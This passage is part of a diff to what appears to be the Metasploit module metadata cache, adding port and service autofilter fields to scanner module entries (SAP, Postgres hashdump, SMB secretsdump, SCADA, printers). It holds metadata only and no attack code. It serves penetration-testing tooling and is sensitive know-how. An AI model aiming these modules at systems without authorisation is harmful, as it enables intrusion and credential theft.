21:01:10 +0000", "path": "/modules/auxiliary/scanner/oracle/xdb_sid.rb", @@ -23387,6 +31903,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb", @@ -23416,6 +31947,12 @@ "platform": "", "arch": "", "rport": 5631, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb", @@ -23445,6 +31982,12 @@ "platform": "", "arch": "", "rport": 5631, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb", @@ -23474,6 +32017,12 @@ "platform": "", "arch": "", "rport": 5632, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb", @@ -23504,6 +32053,12 @@ "platform": "", "arch": "", "rport": 110, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-10-14 11:05:54 +0000", "path": "/modules/auxiliary/scanner/pop3/pop3_login.rb", @@ -23533,6 +32088,12 @@ "platform": "", "arch": "", "rport": 110, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/pop3/pop3_version.rb", @@ -23564,6 +32125,12 @@ "platform": "", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/portmap/portmap_amp.rb", @@ -23593,6 +32160,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/portscan/ack.rb", @@ -23622,6 +32195,13 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/portscan/ftpbounce.rb", @@ -23651,6 +32231,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/portscan/syn.rb", @@ -23681,6 +32267,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/portscan/tcp.rb", @@ -23710,6 +32302,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/portscan/xmas.rb", @@ -23740,6 +32338,12 @@ "platform": "", "arch": "", "rport": 5432, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb", @@ -23769,6 +32373,12 @@ "platform": "", "arch": "", "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/postgres/postgres_hashdump.rb", @@ -23800,6 +32410,12 @@ "platform": "", "arch": "", "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/postgres/postgres_login.rb", @@ -23829,6 +32445,12 @@ "platform": "", "arch": "", "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/postgres/postgres_schemadump.rb", @@ -23858,6 +32480,12 @@ "platform": "", "arch": "", "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/postgres/postgres_version.rb", @@ -23890,6 +32518,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/printer/canon_iradv_pwd_extract.rb", @@ -23923,6 +32566,12 @@ "platform": "", "arch": "", "rport": 9100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/printer/printer_delete_file.rb", @@ -23956,6 +32605,12 @@ "platform": "", "arch": "", "rport": 9100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/printer/printer_download_file.rb", @@ -23989,6 +32644,12 @@ "platform": "", "arch": "", "rport": 9100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/printer/printer_env_vars.rb", @@ -24022,6 +32683,12 @@ "platform": "", "arch": "", "rport": 9100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/printer/printer_list_dir.rb", @@ -24055,6 +32722,12 @@ "platform": "", "arch": "", "rport": 9100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/printer/printer_list_volumes.rb", @@ -24088,6 +32761,12 @@ "platform": "", "arch": "", "rport": 9100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/printer/printer_ready_message.rb", @@ -24121,6 +32800,12 @@ "platform": "", "arch": "", "rport": 9100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/printer/printer_upload_file.rb", @@ -24154,6 +32839,12 @@ "platform": "", "arch": "", "rport": 9100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/printer/printer_version_info.rb", @@ -24183,6 +32874,12 @@ "platform": "", "arch": "", "rport": 27960, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/quake/server_info.rb", @@ -24217,6 +32914,12 @@ "platform": "", "arch": "", "rport": 3389, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/rdp/ms12_020_check.rb", @@ -24246,6 +32949,12 @@ "platform": "", "arch": "", "rport": 3389, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-09 21:32:15 +0000", "path": "/modules/auxiliary/scanner/rdp/rdp_scanner.rb", @@ -24278,6 +32987,12 @@ "platform": "", "arch": "", "rport": 6379, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/redis/file_upload.rb", @@ -24307,6 +33022,12 @@ "platform": "", "arch": "", "rport": 6379, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/redis/redis_login.rb", @@ -24337,6 +33058,12 @@ "platform": "", "arch": "", "rport": 6379, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/redis/redis_server.rb", @@ -24366,6 +33093,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/rogue/rogue_recv.rb", @@ -24395,6 +33128,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/rogue/rogue_send.rb", @@ -24425,6 +33164,12 @@ "platform": "", "arch": "", "rport": 512, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/rservices/rexec_login.rb", @@ -24455,6 +33200,12 @@ "platform": "", "arch": "", "rport": 513, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/rservices/rlogin_login.rb", @@ -24485,6 +33236,12 @@ "platform": "", "arch": "", "rport": 514, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/rservices/rsh_login.rb", @@ -24516,6 +33273,12 @@ "platform": "", "arch": "", "rport": 873, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/rsync/modules_list.rb", @@ -24547,6 +33310,21 @@ "platform": "", "arch": "", "rport": 50000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb", @@ -24580,6 +33358,22 @@ "platform": "", "arch": "", "rport": 1128, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 1128 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb", @@ -24611,6 +33405,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_icf_public_info.rb", @@ -24640,6 +33449,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb", @@ -24669,6 +33493,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb", @@ -24698,6 +33538,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb", @@ -24727,6 +33583,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb", @@ -24756,6 +33628,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb", @@ -24785,6 +33673,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb", @@ -24815,6 +33719,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb", @@ -24845,6 +33765,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb", @@ -24874,6 +33810,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb", @@ -24903,6 +33855,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb", @@ -24932,6 +33900,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb", @@ -24961,6 +33945,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb", @@ -24990,6 +33990,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb", @@ -25022,6 +34038,12 @@ "platform": "", "arch": "", "rport": 3299, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_router_info_request.rb", @@ -25056,6 +34078,12 @@ "platform": "", "arch": "", "rport": "3299", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_router_portscanner.rb", @@ -25085,6 +34113,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_service_discovery.rb", @@ -25116,6 +34150,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_smb_relay.rb", @@ -25146,6 +34195,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb", @@ -25176,6 +34240,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb", @@ -25206,6 +34285,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb", @@ -25236,6 +34330,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb", @@ -25265,6 +34374,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb", @@ -25297,6 +34421,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb", @@ -25327,6 +34466,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb", @@ -25357,6 +34511,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb", @@ -25388,6 +34557,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb", @@ -25418,6 +34602,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb", @@ -25448,6 +34647,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb", @@ -25478,6 +34692,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb", @@ -25510,6 +34739,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb", @@ -25540,6 +34784,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb", @@ -25569,6 +34828,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb", @@ -25599,6 +34873,12 @@ "platform": "", "arch": "", "rport": 2362, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/scada/digi_addp_reboot.rb", @@ -25629,6 +34909,12 @@ "platform": "", "arch": "", "rport": 2362, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/scada/digi_addp_version.rb", @@ -25659,6 +34945,12 @@ "platform": "", "arch": "", "rport": 771, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb", @@ -25689,6 +34981,12 @@ "platform": "", "arch": "", "rport": 771, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/scada/digi_realport_version.rb", @@ -25722,6 +35020,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb", @@ -25752,6 +35065,12 @@ "platform": "", "arch": "", "rport": 28784, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/scada/koyo_login.rb", @@ -25782,6 +35101,12 @@ "platform": "", "arch": "", "rport": 502, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/scada/modbus_findunitid.rb", @@ -25814,6 +35139,12 @@ "platform": "", "arch": "", "rport": 502, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/scada/modbusclient.rb", @@ -25844,6 +35175,12 @@ "platform": "", "arch": "", "rport": 502, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/scada/modbusdetect.rb", @@ -25875,6 +35212,12 @@ "platform": "", "arch": "", "rport": 4800, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/scada/moxa_discover.rb", @@ -25905,6 +35248,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/scada/profinet_siemens.rb", @@ -25939,6 +35288,12 @@ "platform": "", "arch": "", "rport": 46824, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb", @@ -25968,6 +35323,12 @@ "platform": "", "arch": "", "rport": 5060, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sip/enumerator.rb", @@ -25997,6 +35358,12 @@ "platform": "", "arch": "", "rport": 5060, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sip/enumerator_tcp.rb", @@ -26026,6 +35393,12 @@ "platform": "", "arch": "", "rport": 5060, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sip/options.rb", @@ -26055,6 +35428,12 @@ "platform": "", "arch": "", "rport": 5060, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/sip/options_tcp.rb", @@ -26085,6 +35464,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb", @@ -26118,6 +35503,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-27 16:06:07 +0000", "path": "/modules/auxiliary/scanner/smb/impacket/dcomexec.py", @@ -26162,6 +35553,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-27 16:06:07 +0000", "path": "/modules/auxiliary/scanner/smb/impacket/secretsdump.py", @@ -26195,6 +35592,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-27 16:06:07 +0000", "path": "/modules/auxiliary/scanner/smb/impacket/wmiexec.py", @@ -26227,6 +35630,14 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-03-22 06:41:58 +0000", "path": "/modules/auxiliary/scanner/smb/pipe_auditor.rb", @@ -26256,6 +35667,14 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb", @@ -26288,6 +35707,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb", @@ -26317,6 +35744,12 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-09-18 15:02:38 +0000", "path": "/modules/auxiliary/scanner/smb/smb1.rb", @@ -26346,6 +35779,12 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, 